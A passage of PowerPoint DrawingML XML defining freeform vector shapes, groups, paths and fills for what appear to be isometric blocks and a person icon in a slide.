                      <a:srgbClr val="303030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67" name="Freeform 2161">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59D85659-6F45-425B-94E6-22D99840896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183" y="1595"/>
                      <a:ext cx="322" cy="86"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 680"/>
                        <a:gd name="T1" fmla="*/ 62 h 182"/>
                        <a:gd name="T2" fmla="*/ 227 w 680"/>
                        <a:gd name="T3" fmla="*/ 0 h 182"/>
                        <a:gd name="T4" fmla="*/ 680 w 680"/>
                        <a:gd name="T5" fmla="*/ 123 h 182"/>
                        <a:gd name="T6" fmla="*/ 453 w 680"/>
                        <a:gd name="T7" fmla="*/ 182 h 182"/>
                        <a:gd name="T8" fmla="*/ 0 w 680"/>
                        <a:gd name="T9" fmla="*/ 62 h 1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0" h="182">
                          <a:moveTo>
                            <a:pt x="0" y="62"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="227" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="680" y="123"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="453" y="182"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="62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68" name="Freeform 2162">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73B9056D-E9F9-4474-91A1-E028D302982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183" y="1180"/>
                      <a:ext cx="322" cy="87"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 680"/>
                        <a:gd name="T1" fmla="*/ 61 h 184"/>
                        <a:gd name="T2" fmla="*/ 227 w 680"/>
                        <a:gd name="T3" fmla="*/ 0 h 184"/>
                        <a:gd name="T4" fmla="*/ 680 w 680"/>
                        <a:gd name="T5" fmla="*/ 122 h 184"/>
                        <a:gd name="T6" fmla="*/ 453 w 680"/>
                        <a:gd name="T7" fmla="*/ 184 h 184"/>
                        <a:gd name="T8" fmla="*/ 0 w 680"/>
                        <a:gd name="T9" fmla="*/ 61 h 18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0" h="184">
                          <a:moveTo>
                            <a:pt x="0" y="61"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="227" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="680" y="122"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="453" y="184"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="61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69" name="Freeform 2163">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4F19542-317D-41F9-88B5-FC2F5BF91BF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183" y="1402"/>
                      <a:ext cx="322" cy="86"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 680"/>
                        <a:gd name="T1" fmla="*/ 59 h 182"/>
                        <a:gd name="T2" fmla="*/ 227 w 680"/>
                        <a:gd name="T3" fmla="*/ 0 h 182"/>
                        <a:gd name="T4" fmla="*/ 680 w 680"/>
                        <a:gd name="T5" fmla="*/ 120 h 182"/>
                        <a:gd name="T6" fmla="*/ 453 w 680"/>
                        <a:gd name="T7" fmla="*/ 182 h 182"/>
                        <a:gd name="T8" fmla="*/ 0 w 680"/>
                        <a:gd name="T9" fmla="*/ 59 h 1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0" h="182">
                          <a:moveTo>
                            <a:pt x="0" y="59"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="227" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="680" y="120"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="453" y="182"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="59"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="6D6D6C"/>
                    </a:solidFill>
                    <a:ln w="6350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70" name="Freeform 2164">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21AA9BD2-9D61-431E-852D-B16ED1DA6EC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371" y="1259"/>
                      <a:ext cx="27" cy="450"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 56"/>
                        <a:gd name="T1" fmla="*/ 938 h 952"/>
                        <a:gd name="T2" fmla="*/ 0 w 56"/>
                        <a:gd name="T3" fmla="*/ 0 h 952"/>
                        <a:gd name="T4" fmla="*/ 56 w 56"/>
                        <a:gd name="T5" fmla="*/ 17 h 952"/>
                        <a:gd name="T6" fmla="*/ 56 w 56"/>
                        <a:gd name="T7" fmla="*/ 952 h 952"/>
                        <a:gd name="T8" fmla="*/ 0 w 56"/>
                        <a:gd name="T9" fmla="*/ 938 h 95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6" h="952">
                          <a:moveTo>
                            <a:pt x="0" y="938"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="56" y="17"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="56" y="952"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="938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71" name="Freeform 2165">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08DCB26F-D88C-488D-80C2-44A94FC6E98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183" y="1209"/>
                      <a:ext cx="27" cy="450"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 57"/>
                        <a:gd name="T1" fmla="*/ 938 h 952"/>
                        <a:gd name="T2" fmla="*/ 0 w 57"/>
                        <a:gd name="T3" fmla="*/ 0 h 952"/>
                        <a:gd name="T4" fmla="*/ 57 w 57"/>
                        <a:gd name="T5" fmla="*/ 17 h 952"/>
                        <a:gd name="T6" fmla="*/ 57 w 57"/>
                        <a:gd name="T7" fmla="*/ 952 h 952"/>
                        <a:gd name="T8" fmla="*/ 0 w 57"/>
                        <a:gd name="T9" fmla="*/ 938 h 95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952">
                          <a:moveTo>
                            <a:pt x="0" y="938"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57" y="17"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57" y="952"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="938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72" name="Freeform 2166">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A610F7E7-A192-40A6-B5BE-BBB7014E2BE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210" y="1438"/>
                      <a:ext cx="161" cy="70"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 340"/>
                        <a:gd name="T1" fmla="*/ 0 h 149"/>
                        <a:gd name="T2" fmla="*/ 340 w 340"/>
                        <a:gd name="T3" fmla="*/ 90 h 149"/>
                        <a:gd name="T4" fmla="*/ 340 w 340"/>
                        <a:gd name="T5" fmla="*/ 149 h 149"/>
                        <a:gd name="T6" fmla="*/ 2 w 340"/>
                        <a:gd name="T7" fmla="*/ 59 h 149"/>
                        <a:gd name="T8" fmla="*/ 0 w 340"/>
                        <a:gd name="T9" fmla="*/ 0 h 14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40" h="149">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="340" y="90"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="340" y="149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2" y="5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73" name="Freeform 2167">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B9C2ED3-BFF3-439C-9DE6-190354B24DB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210" y="1217"/>
                      <a:ext cx="161" cy="70"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 340"/>
                        <a:gd name="T1" fmla="*/ 0 h 148"/>
                        <a:gd name="T2" fmla="*/ 340 w 340"/>
                        <a:gd name="T3" fmla="*/ 89 h 148"/>
                        <a:gd name="T4" fmla="*/ 340 w 340"/>
                        <a:gd name="T5" fmla="*/ 148 h 148"/>
                        <a:gd name="T6" fmla="*/ 2 w 340"/>
                        <a:gd name="T7" fmla="*/ 56 h 148"/>
                        <a:gd name="T8" fmla="*/ 0 w 340"/>
                        <a:gd name="T9" fmla="*/ 0 h 14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40" h="148">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="340" y="89"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="340" y="148"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2" y="5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74" name="Freeform 2168">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{640EE9D5-62BD-4D11-9BA4-30D833C6606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211" y="1631"/>
                      <a:ext cx="160" cy="71"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 338"/>
                        <a:gd name="T1" fmla="*/ 0 h 151"/>
                        <a:gd name="T2" fmla="*/ 338 w 338"/>
                        <a:gd name="T3" fmla="*/ 92 h 151"/>
                        <a:gd name="T4" fmla="*/ 338 w 338"/>
                        <a:gd name="T5" fmla="*/ 151 h 151"/>
                        <a:gd name="T6" fmla="*/ 0 w 338"/>
                        <a:gd name="T7" fmla="*/ 59 h 151"/>
                        <a:gd name="T8" fmla="*/ 0 w 338"/>
                        <a:gd name="T9" fmla="*/ 0 h 15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38" h="151">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="338" y="92"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="338" y="151"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5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545554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75" name="Freeform 2169">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0461F00-E28F-4390-9663-4F676A26AFC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3398" y="1238"/>
                      <a:ext cx="107" cy="471"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 227 w 227"/>
                        <a:gd name="T1" fmla="*/ 0 h 997"/>
                        <a:gd name="T2" fmla="*/ 0 w 227"/>
                        <a:gd name="T3" fmla="*/ 62 h 997"/>
                        <a:gd name="T4" fmla="*/ 0 w 227"/>
                        <a:gd name="T5" fmla="*/ 997 h 997"/>
                        <a:gd name="T6" fmla="*/ 227 w 227"/>
                        <a:gd name="T7" fmla="*/ 936 h 997"/>
                        <a:gd name="T8" fmla="*/ 227 w 227"/>
                        <a:gd name="T9" fmla="*/ 0 h 9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27" h="997">
                          <a:moveTo>
                            <a:pt x="227" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="62"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="997"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="227" y="936"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="227" y="0"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="303030"/>
                    </a:solidFill>
                    <a:ln w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="545554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339" name="Group 2170">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EF63EDF-6D71-47C1-8E1F-A18F62C803E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669" y="2487"/>
                    <a:ext cx="266" cy="635"/>
                    <a:chOff x="4659" y="1323"/>
                    <a:chExt cx="266" cy="635"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2362" name="Freeform 2171">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31122D4F-BBBF-492E-ABF4-5D259CF166A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4726" y="1629"/>
                      <a:ext cx="121" cy="329"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 89 w 90"/>
                        <a:gd name="T1" fmla="*/ 156 h 245"/>
                        <a:gd name="T2" fmla="*/ 90 w 90"/>
                        <a:gd name="T3" fmla="*/ 7 h 245"/>
                        <a:gd name="T4" fmla="*/ 89 w 90"/>
                        <a:gd name="T5" fmla="*/ 5 h 245"/>
                        <a:gd name="T6" fmla="*/ 63 w 90"/>
                        <a:gd name="T7" fmla="*/ 20 h 245"/>
                        <a:gd name="T8" fmla="*/ 12 w 90"/>
                        <a:gd name="T9" fmla="*/ 10 h 245"/>
                        <a:gd name="T10" fmla="*/ 3 w 90"/>
                        <a:gd name="T11" fmla="*/ 0 h 245"/>
                        <a:gd name="T12" fmla="*/ 3 w 90"/>
                        <a:gd name="T13" fmla="*/ 36 h 245"/>
                        <a:gd name="T14" fmla="*/ 2 w 90"/>
                        <a:gd name="T15" fmla="*/ 205 h 245"/>
                        <a:gd name="T16" fmla="*/ 44 w 90"/>
                        <a:gd name="T17" fmla="*/ 204 h 245"/>
                        <a:gd name="T18" fmla="*/ 45 w 90"/>
                        <a:gd name="T19" fmla="*/ 51 h 245"/>
                        <a:gd name="T20" fmla="*/ 36 w 90"/>
                        <a:gd name="T21" fmla="*/ 39 h 245"/>
                        <a:gd name="T22" fmla="*/ 45 w 90"/>
                        <a:gd name="T23" fmla="*/ 51 h 245"/>
                        <a:gd name="T24" fmla="*/ 44 w 90"/>
                        <a:gd name="T25" fmla="*/ 204 h 245"/>
                        <a:gd name="T26" fmla="*/ 44 w 90"/>
                        <a:gd name="T27" fmla="*/ 211 h 245"/>
                        <a:gd name="T28" fmla="*/ 88 w 90"/>
                        <a:gd name="T29" fmla="*/ 218 h 245"/>
                        <a:gd name="T30" fmla="*/ 89 w 90"/>
                        <a:gd name="T31" fmla="*/ 156 h 24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90" h="245">
                          <a:moveTo>
                            <a:pt x="89" y="156"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="89" y="140"/>
                            <a:pt x="90" y="47"/>
                            <a:pt x="90" y="7"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="89" y="6"/>
                            <a:pt x="89" y="6"/>
                            <a:pt x="89" y="5"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="87" y="16"/>
                            <a:pt x="71" y="22"/>
                            <a:pt x="63" y="20"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="55" y="19"/>
                            <a:pt x="24" y="13"/>
                            <a:pt x="12" y="10"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="6" y="9"/>
                            <a:pt x="4" y="4"/>
                            <a:pt x="3" y="0"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="2" y="18"/>
                            <a:pt x="3" y="32"/>
                            <a:pt x="3" y="36"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="3" y="49"/>
                            <a:pt x="0" y="181"/>
                            <a:pt x="2" y="205"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="3" y="228"/>
                            <a:pt x="43" y="224"/>
                            <a:pt x="44" y="204"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="43" y="170"/>
                            <a:pt x="46" y="55"/>
                            <a:pt x="45" y="51"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="45" y="47"/>
                            <a:pt x="36" y="46"/>
                            <a:pt x="36" y="39"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="36" y="46"/>
                            <a:pt x="45" y="47"/>
                            <a:pt x="45" y="51"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="46" y="55"/>
                            <a:pt x="43" y="170"/>
                            <a:pt x="44" y="204"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="44" y="206"/>
                            <a:pt x="44" y="211"/>
                            <a:pt x="44" y="211"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="46" y="245"/>
                            <a:pt x="87" y="235"/>
                            <a:pt x="88" y="218"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="90" y="201"/>
                            <a:pt x="88" y="171"/>
                            <a:pt x="89" y="15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50000">
                          <a:schemeClr val="bg1">
                            <a:gamma/>
                            <a:shade val="85882"/>
                            <a:invGamma/>
                          </a:schemeClr>
                        </a:gs>
                        <a:gs pos="100000">
                          <a:schemeClr val="bg1"/>
                        </a:gs>
                      </a:gsLst>
                      <a:lin ang="0" scaled="1"/>
                    </a:gra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63" name="Freeform 2172">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC9C6161-7AA4-4FE9-837E-6EC7FC64773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4659" y="1409"/>
                      <a:ext cx="266" cy="310"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 192 w 198"/>
                        <a:gd name="T1" fmla="*/ 194 h 231"/>
                        <a:gd name="T2" fmla="*/ 169 w 198"/>
                        <a:gd name="T3" fmla="*/ 49 h 231"/>
                        <a:gd name="T4" fmla="*/ 143 w 198"/>
                        <a:gd name="T5" fmla="*/ 24 h 231"/>
                        <a:gd name="T6" fmla="*/ 100 w 198"/>
                        <a:gd name="T7" fmla="*/ 12 h 231"/>
                        <a:gd name="T8" fmla="*/ 60 w 198"/>
                        <a:gd name="T9" fmla="*/ 2 h 231"/>
                        <a:gd name="T10" fmla="*/ 30 w 198"/>
                        <a:gd name="T11" fmla="*/ 11 h 231"/>
                        <a:gd name="T12" fmla="*/ 4 w 198"/>
                        <a:gd name="T13" fmla="*/ 159 h 231"/>
                        <a:gd name="T14" fmla="*/ 36 w 198"/>
                        <a:gd name="T15" fmla="*/ 168 h 231"/>
                        <a:gd name="T16" fmla="*/ 54 w 198"/>
                        <a:gd name="T17" fmla="*/ 47 h 231"/>
                        <a:gd name="T18" fmla="*/ 53 w 198"/>
                        <a:gd name="T19" fmla="*/ 164 h 231"/>
                        <a:gd name="T20" fmla="*/ 62 w 198"/>
                        <a:gd name="T21" fmla="*/ 174 h 231"/>
                        <a:gd name="T22" fmla="*/ 113 w 198"/>
                        <a:gd name="T23" fmla="*/ 188 h 231"/>
                        <a:gd name="T24" fmla="*/ 140 w 198"/>
                        <a:gd name="T25" fmla="*/ 169 h 231"/>
                        <a:gd name="T26" fmla="*/ 140 w 198"/>
                        <a:gd name="T27" fmla="*/ 169 h 231"/>
                        <a:gd name="T28" fmla="*/ 138 w 198"/>
                        <a:gd name="T29" fmla="*/ 87 h 231"/>
                        <a:gd name="T30" fmla="*/ 136 w 198"/>
                        <a:gd name="T31" fmla="*/ 70 h 231"/>
                        <a:gd name="T32" fmla="*/ 136 w 198"/>
                        <a:gd name="T33" fmla="*/ 69 h 231"/>
                        <a:gd name="T34" fmla="*/ 136 w 198"/>
                        <a:gd name="T35" fmla="*/ 70 h 231"/>
                        <a:gd name="T36" fmla="*/ 138 w 198"/>
                        <a:gd name="T37" fmla="*/ 87 h 231"/>
                        <a:gd name="T38" fmla="*/ 159 w 198"/>
                        <a:gd name="T39" fmla="*/ 203 h 231"/>
                        <a:gd name="T40" fmla="*/ 192 w 198"/>
                        <a:gd name="T41" fmla="*/ 194 h 23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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="198" h="231">
                          <a:moveTo>
                            <a:pt x="192" y="194"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="189" y="184"/>
                            <a:pt x="172" y="67"/>
                            <a:pt x="169" y="49"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="166" y="32"/>
                            <a:pt x="151" y="26"/>
                            <a:pt x="143" y="24"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="135" y="21"/>
                            <a:pt x="113" y="16"/>
                            <a:pt x="100" y="12"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="88" y="9"/>
                            <a:pt x="69" y="3"/>
                            <a:pt x="60" y="2"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="51" y="0"/>
                            <a:pt x="33" y="3"/>
                            <a:pt x="30" y="11"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="28" y="17"/>
                            <a:pt x="8" y="139"/>
                            <a:pt x="4" y="159"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="180"/>
                            <a:pt x="31" y="184"/>
                            <a:pt x="36" y="168"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="40" y="157"/>
                            <a:pt x="55" y="38"/>
                            <a:pt x="54" y="47"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="54" y="53"/>
                            <a:pt x="53" y="121"/>
                            <a:pt x="53" y="164"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="54" y="169"/>
                            <a:pt x="56" y="173"/>
                            <a:pt x="62" y="174"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="74" y="177"/>
                            <a:pt x="106" y="187"/>
                            <a:pt x="113" y="188"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="121" y="190"/>
                            <a:pt x="137" y="180"/>
                            <a:pt x="140" y="169"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="140" y="169"/>
                            <a:pt x="140" y="169"/>
                            <a:pt x="140" y="169"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="140" y="141"/>
                            <a:pt x="140" y="110"/>
                            <a:pt x="138" y="87"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="137" y="78"/>
                            <a:pt x="137" y="73"/>
                            <a:pt x="136" y="70"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="136" y="69"/>
                            <a:pt x="136" y="69"/>
                            <a:pt x="136" y="69"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="136" y="69"/>
                            <a:pt x="136" y="69"/>
                            <a:pt x="136" y="70"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="137" y="75"/>
                            <a:pt x="138" y="81"/>
                            <a:pt x="138" y="87"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="141" y="109"/>
                            <a:pt x="148" y="149"/>
                            <a:pt x="159" y="203"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="165" y="231"/>
                            <a:pt x="198" y="218"/>
                            <a:pt x="192" y="194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50000">
                          <a:schemeClr val="bg1">
                            <a:gamma/>
                            <a:shade val="85882"/>
                            <a:invGamma/>
                          </a:schemeClr>
                        </a:gs>
                        <a:gs pos="100000">
                          <a:schemeClr val="bg1"/>
                        </a:gs>
                      </a:gsLst>
                      <a:lin ang="0" scaled="1"/>
                    </a:gra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64" name="Freeform 2173">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01BAF4F4-5FBD-4D26-89E0-39B8D03A63B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4745" y="1392"/>
                      <a:ext cx="88" cy="55"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 29 w 66"/>
                        <a:gd name="T1" fmla="*/ 39 h 41"/>
                        <a:gd name="T2" fmla="*/ 9 w 66"/>
                        <a:gd name="T3" fmla="*/ 23 h 41"/>
                        <a:gd name="T4" fmla="*/ 15 w 66"/>
                        <a:gd name="T5" fmla="*/ 13 h 41"/>
                        <a:gd name="T6" fmla="*/ 53 w 66"/>
                        <a:gd name="T7" fmla="*/ 16 h 41"/>
                        <a:gd name="T8" fmla="*/ 57 w 66"/>
                        <a:gd name="T9" fmla="*/ 30 h 41"/>
                        <a:gd name="T10" fmla="*/ 29 w 66"/>
                        <a:gd name="T11" fmla="*/ 39 h 4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66" h="41">
                          <a:moveTo>
                            <a:pt x="29" y="39"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="14" y="37"/>
                            <a:pt x="0" y="25"/>
                            <a:pt x="9" y="23"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="16" y="21"/>
                            <a:pt x="13" y="16"/>
                            <a:pt x="15" y="13"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="18" y="10"/>
                            <a:pt x="53" y="0"/>
                            <a:pt x="53" y="16"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="53" y="21"/>
                            <a:pt x="47" y="25"/>
                            <a:pt x="57" y="30"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="66" y="33"/>
                            <a:pt x="46" y="41"/>
                            <a:pt x="29" y="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65" name="Oval 2174">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAE18A8D-D9C8-4501-91BA-9B9656A81C0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gray">
                    <a:xfrm flipH="1">
                      <a:off x="4733" y="1323"/>
                      <a:ext cx="106" cy="10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6350" algn="ctr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340" name="Group 2175">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B119A51D-5623-410C-AA0E-9127DAB6D85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938" y="2733"/>
                    <a:ext cx="1084" cy="517"/>
                    <a:chOff x="1938" y="2733"/>
                    <a:chExt cx="1084" cy="517"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:grpSp>
                  <p:nvGrpSpPr>
                    <p:cNvPr id="2346" name="Group 2176">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AE251BC-2872-490B-A32F-E7DE00906A5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938" y="2733"/>
                      <a:ext cx="434" cy="341"/>
                      <a:chOff x="2588" y="2910"/>
                      <a:chExt cx="434" cy="341"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="2359" name="Freeform 2177">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2DBC441-70D8-47B9-BA65-BC2B37C0BFF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588" y="2910"/>
                        <a:ext cx="434" cy="117"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 904"/>
                          <a:gd name="T1" fmla="*/ 123 h 244"/>
                          <a:gd name="T2" fmla="*/ 451 w 904"/>
                          <a:gd name="T3" fmla="*/ 0 h 244"/>
                          <a:gd name="T4" fmla="*/ 904 w 904"/>
                          <a:gd name="T5" fmla="*/ 123 h 244"/>
                          <a:gd name="T6" fmla="*/ 451 w 904"/>
                          <a:gd name="T7" fmla="*/ 244 h 244"/>
                          <a:gd name="T8" fmla="*/ 0 w 904"/>
                          <a:gd name="T9" fmla="*/ 123 h 24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904" h="244">
                            <a:moveTo>
                              <a:pt x="0" y="123"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="451" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="904" y="123"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="451" y="244"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="123"/>
                            </a:lnTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
